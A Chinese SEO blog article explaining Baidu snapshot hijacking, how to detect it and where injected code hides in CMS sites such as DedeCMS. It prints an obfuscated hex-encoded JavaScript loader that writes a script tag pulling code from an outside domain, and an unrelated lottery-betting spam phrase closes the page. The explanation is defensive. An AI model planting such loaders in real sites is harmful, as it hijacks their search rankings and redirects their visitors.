代理加盟 2019全新代理計劃 賺錢+省錢雙管齊下,獨立平臺,豐厚利潤!

您現在的位置: 秀站網 > 站長學院 > SEO資訊 >

什么是快照劫持及解決辦法

來源:未知 發布時間:2019-03-30熱度:我要評論
近段時間朋友裝修站經常有些莫名其妙的搜索關鍵詞來到網站,第一感覺就是被人攻擊了,但也看不出有什么異樣,只是在快照上有顯示主域名的標題卻是另外的菠菜站。由此初步懷疑是 百度快照劫持 ,首先了解下什么是快照劫持。 百度快照劫持就是黑客通過技術手段拿到你網站...

       近段時間朋友裝修站經常有些莫名其妙的搜索關鍵詞來到網站,第一感覺就是被人攻擊了,但也看不出有什么異樣,只是在快照上有顯示主域名的標題卻是另外的菠菜站。由此初步懷疑是百度快照劫持,首先了解下什么是快照劫持。

       百度快照劫持就是黑客通過技術手段拿到你網站FTP權限或者數據庫權限植入代碼或添加劫持腳本,把他想要的內容寫進一個頁面代碼里,在首頁Head標簽下調用,當搜索引擎訪問你網站的時候抓取到你網站的標題-關鍵詞-描述的時候,就會抓取到黑客設定的任何內容!

       一般用site命令查看百度快照情況,如

site:vi586.com

       如果看到和你寫的標題、描述不一樣,就可以判斷是黑客對快照進行劫持。了解常見的劫持方法,防患于未然,保障網站安全。

百度快照劫持

       從上面的截圖看來中標的不在少數哇,點擊“百度快照”查看快照信息,標題、描述、關鍵詞都正常,時間也是較新的。嘗試投訴快照,情況依舊,就給百度反應情況,還在等待回復中。

百度快照投訴

       除了找百度解決問題之前,還需要對自己的網站進行查找、修復等操作,以免再次受到攻擊。

一 放到<head>標簽

       網站設計中<head>標簽里面有標題、描述、關鍵詞等內容,這部分是明顯寫上去的,如果是寫到生成后的靜態首頁html文件里,每次更新首頁都會消失。但如果不久后又被修改了,就有可能是通過其他木馬定時修改的,要注意找出來。

       以DedeCMS為例,有些文件夾是禁止執行腳本的,所以能修改你的文件肯定在能執行的文件夾內,如果對文件結構不是很熟悉的,可以和官方的文件夾進行對比就能找出問題所在。

二 偽裝JS文件、修改PHP文件

       這個我們你一定經歷過,比如DedeCMS的版權信息,如果你用{dede:global.cfg_poweby/},后面都會加上自帶的織夢鏈接;下載的模板會在友情鏈接里面加入模板開發者的友情鏈接,這些鏈接是在模板里面看不到的,每次刷新位置都不一樣。

       需要注意的是,瀏覽器并不識別JS腳本,如果用JS的方式插入鏈接,在查看源代碼里面是完全看不到具體內容的。其實這個方法也并不高級,常見的如:

<script src="../include/js/jq.js" language="javascript" type="text/javascript"></script>

       該js文件里面有類似這樣的代碼:

var _$=["\x3c\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x77\x77\x77\x2e\x77\x7a\x62\x33\x36\x30\x2e\x74\x6b\/\x69\x6d\x61\x67\x65\x2e\x67\x69\x66\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e"];

document.writeln(_$[0]);

       第一句是通過加密的代碼,第二句輸出內容,一般服務器做特殊處理,才能輸出正確的內容,所以應該還有一些PHP文件。

       PHP有許多包含的寫法,比如/include文件夾,在核心的PHP文件里面加入劫持代碼,神不知鬼不覺。

       上面的方法都是比較常見的,一般的CMS有一定的防護能力,只要自己的數據庫、服務器密碼不泄露,這些都能及時解決。

三 你已經成為黑客的“肉雞”

       “肉雞”可能很多人不太理解,說白了,服務器、數據庫已經被黑客拿到了,或者說獲得修改權限。

       百度有主動提交(投訴)快照的功能,黑客可以在晚上無人值守的時候偷偷修改模板文件,生成主頁后向百度提交URL,然后再回復成原來的樣子。

快照劫持總結

       黑客通過快照劫持代碼能實現百度快照劫持,是黑帽SEO比較早的技術,通過劫持webshell網站,實現自己的網站排名,主要功能是改變webshell網站的快照,使其快照顯示為你設置的快照,這個時候對方的網站快照(包括標題,關鍵字,描述都變成你的)。

       代碼通過實現快照變成你的,當然排名也變成你的,通過內置的跳轉代碼,每次通過搜索引擎點進去,網站就會跳轉到其他網站。這就是百度快照劫持的原理,以及更高級的301權重劫持手法!

本文地址:http://www.xejrrv.tw/seo/1200.html

    責任編輯:秀站網

    發表評論

    評論列表(條)

      深圳风采手机投注